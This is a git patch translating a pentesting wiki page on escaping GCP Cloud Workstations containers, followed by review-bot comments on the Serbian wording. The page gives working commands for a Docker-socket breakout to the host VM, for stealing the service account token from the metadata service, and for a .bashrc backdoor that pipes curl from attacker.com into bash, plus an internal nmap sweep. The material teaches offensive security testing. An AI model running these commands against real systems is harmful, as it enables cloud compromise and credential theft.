From f909c9967d7eea2c81690207affbeb2eb25d0355 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 3 Mar 2026 15:47:08 +0000 Subject: [PATCH] Translated ['', 'src/pentesting-cloud/gcp-security/gcp-privilege-escalat --- .../gcp-cloud-workstations-privesc.md | 39 +++++++++++-------- 1 file changed, 22 insertions(+), 17 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index 0819441ba..7822021c8 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md 
@@ -1,22 +1,23 @@ # GCP - Cloud Workstations Privesc +{{#include ../../../banners/hacktricks-training.md}} ### Container Breakout via Docker Socket (Container -> VM -> Project) -Primarni put za eskalaciju privilegija u Cloud Workstations proističe iz potrebe da se podrže **Docker-in-Docker (DinD)** workflows za developere. Kada konfiguracija workstation-a montira Docker socket ili dozvoljava privileged containers (uobičajena konfiguracija), napadač unutar workstation kontejnera može pobeći na podložni Compute Engine VM i ukrasti njegov service account token. +Primarni put eskalacije privilegija u Cloud Workstations potiče iz potrebe da se podrže **Docker-in-Docker (DinD)** workflows za developere. Kada konfiguracija workstation-a montira Docker socket ili omogućava privileged containers (uobičajena konfiguracija), napadač unutar workstation containera može pobjeći na osnovni Compute Engine VM i ukrasti njegov service account token. -**Preduslovi:** -- Pristup Cloud Workstation terminalu (putem SSH, kompromitovane sesije, ili ukradenih kredencijala) +**Prerequisites:** +- Pristup Cloud Workstation terminalu (putem SSH, kompromitovane sesije, ili ukradenih akreditiva) - Konfiguracija workstation-a mora montirati `/var/run/docker.sock` ili omogućiti privileged containers -**Arhitektonski kontekst:** Workstation je kontejner (Layer 3) koji se izvršava na Docker/Containerd runtime-u (Layer 2) na GCE VM-u (Layer 1). Docker socket daje direktan pristup host-ovom container runtime-u. +**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime. > [!NOTE] -> Alat [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automatizuje kompletan container escape i otvara vam root shell na host VM-u. 
+> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.
-Korak 1: Proverite Docker socket +Korak 1: Provera Docker socketa ```bash # Verify the Docker socket is available ls -l /var/run/docker.sock @@ -26,9 +27,9 @@ ls -l /var/run/docker.sock
-Korak 2: Bekstvo u fajl sistem host VM-a +Korak 2: Pobegnite na fajl-sistem host VM-a -Pokrećemo privilegovani kontejner, montirajući korenski direktorijum hosta na `/mnt/host`. Takođe delimo mrežu hosta i PID namespace kako bismo maksimizirali vidljivost. +Pokrećemo privilegovani kontejner, montirajući root direktorijum hosta u `/mnt/host`. Takođe delimo mrežu i PID namespace hosta da bismo maksimalno povećali vidljivost. ```bash # Spawn a privileged container mounting the host's root filesystem docker run -it --rm --privileged --net=host --pid=host \ @@ -38,13 +39,13 @@ alpine sh # Inside the new container, chroot into the host chroot /mnt/host /bin/bash ``` -Sada imate **root shell na osnovnom Compute Engine VM** (Layer 1). +Sada imate **root shell na osnovnom Compute Engine VM-u** (Sloj 1).
-Korak 3: Steal the VM service account token from IMDS +Korak 3: Ukradi VM service account token iz IMDS ```bash # From the host VM, query the Instance Metadata Service curl -s -H "Metadata-Flavor: Google" \ @@ -61,16 +62,16 @@ http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scop
> [!CAUTION] -> **Proverite pristupne scope-ove!** -> Čak i ako je priloženi Service Account **Editor**, VM može biti ograničen pristupnim scope-ovima. -> Ako vidite `https://www.googleapis.com/auth/cloud-platform`, imate pun pristup. -> Ako vidite samo `logging.write` i `monitoring.write`, ograničeni ste na vektore **Network Pivot** i **Persistence** navedene dole. +> **Proverite opsege pristupa!** +> Čak i ako je priloženi Service Account je **Editor**, VM može biti ograničen opsezima pristupa. +> Ako vidite `https://www.googleapis.com/auth/cloud-platform`, imate potpuni pristup. +> Ako vidite samo `logging.write` i `monitoring.write`, ograničeni ste na **Network Pivot** i **Persistence** vektore u nastavku.
Korak 4: Achieve Persistence (Backdoor the User) -Cloud Workstations montiraju persistent disk na `/home/user`. Pošto se container user (obično `user`, UID 1000) poklapa sa host user-om (UID 1000), možete pisati u home direktorijum hosta. Ovo vam omogućava da ubacite backdoor u okruženje čak i ako se workstation container ponovo izgradi. +Cloud Workstations montiraju persistent disk na `/home/user`. Pošto se container user (obično `user`, UID 1000) poklapa sa host user-om (UID 1000), možete pisati u host-ov home direktorijum. Ovo vam omogućava da backdoor-ujete okruženje čak i ako se workstation container ponovo izgradi. ```bash # Check if you can write to the host's persistent home ls -la /mnt/host/home/user/ @@ -83,9 +84,9 @@ echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
-Step 5: Network Pivot (Internal VPC Access) +Korak 5: Network Pivot (Internal VPC Access) -Pošto delite host network namespace (`--net=host`), sada ste pouzdan čvor u VPC-u. Možete skenirati interne servise koji dozvoljavaju pristup na osnovu IP whitelisting-a. +Pošto delite host network namespace (`--net=host`), sada ste pouzdani čvor na VPC-u. Možete skenirati interne servise koji omogućavaju pristup na osnovu IP whitelisting-a. ```bash # Install scanning tools on the host (if internet access allows) apk add nmap @@ -94,3 +95,7 @@ apk add nmap nmap -sS -p 80,443,22 10.0.0.0/8 ```
+ + + +{{#include ../../../banners/hacktricks-training.md}}
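Review bot: In the first hunk (`@@ -1,22 +1,23 @@`) the translation is partly reversed: `**Preduslovi:**`, the `**Arhitektonski kontekst:**` paragraph and the `> [!NOTE]` callout were Serbian before this change and are replaced with English (`**Prerequisites:**`, `**Architecture context:** The workstation is a container (Layer 3) ...`, `> The tool [gcp-workstations-containerEscapeScript] ... automates the full container escape ...`), so the file now switches language mid-section. Keep those units in Serbian (the removed `-` lines can be reused as they were). In the same hunk, `može pobjeći` is ijekavian while the rest of the page is ekavian (`Pobegnite`, `Proverite`); use `može pobeći`.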
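Review bot: In the `@@ -38,13 +39,13 @@` hunk, `(Sloj 1)` translates "Layer 1" while the architecture paragraph in this same patch keeps `Layer 1`, `Layer 2`, `Layer 3` in English; pick one term for the layer numbering and use it throughout. The step heading `Korak 3: Ukradi VM service account token iz IMDS` uses the informal singular imperative, whereas the other headings use the formal form (`Korak 2: Pobegnite ...`) or a noun (`Korak 1: Provera ...`); align the heading style, for example `Korak 3: Ukradite ...` or `Korak 3: Krađa ...`.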
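Review bot: In the `@@ -61,16 +62,16 @@` hunk the line `> Čak i ako je priloženi Service Account je **Editor**, ...` has a doubled `je`; drop the second one (`> Čak i ako je priloženi Service Account **Editor**, ...`). The unchanged context heading `Korak 4: Achieve Persistence (Backdoor the User)` is still half English, while this patch translates the `Korak 3` and `Korak 5` headings; since the patch is the translation pass for this file, the `Korak 4` heading should be translated in the same change so the step headings are consistent.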
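Review bot: In the `@@ -83,9 +84,9 @@` hunk, `pouzdani čvor na VPC-u` replaces `pouzdan čvor u VPC-u`; "u VPC-u" (in the VPC) is the natural preposition here and matches the English "node in the VPC", so keep `u VPC-u` and only apply the adjective change if that was the intent.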
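Review bot: In the last hunk (`@@ -94,3 +95,7 @@`) three blank lines are added before the closing `{{#include ../../../banners/hacktricks-training.md}}`; a single blank line after the closing code fence is enough, and the extra empty lines will show up as churn in later diffs.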